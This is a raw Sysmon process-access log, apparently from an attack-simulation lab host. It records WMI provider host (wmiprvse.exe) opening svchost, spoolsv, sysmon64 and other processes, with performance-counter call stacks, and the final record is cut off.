21:45:41.517{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F66-60CA-2700-00000000D101}2648C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151013Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.517{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1F00-00000000D101}1340C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000151012Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.517{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1F00-00000000D101}1340C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151011Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.517{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1E00-00000000D101}1056C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000151010Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.517{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1E00-00000000D101}1056C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151009Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.517{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000151008Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.517{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1B00-00000000D101}1972C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151007Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.517{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1A00-00000000D101}1928C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000151006Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.517{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1A00-00000000D101}1928C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151005Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.517{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1900-00000000D101}1808C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000151004Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.517{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1900-00000000D101}1808C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151003Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.517{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1800-00000000D101}1548C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000151002Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.517{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1800-00000000D101}1548C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151001Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.517{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1700-00000000D101}1284C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000151000Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.517{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1700-00000000D101}1284C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150999Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.517{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1600-00000000D101}1164C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150998Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 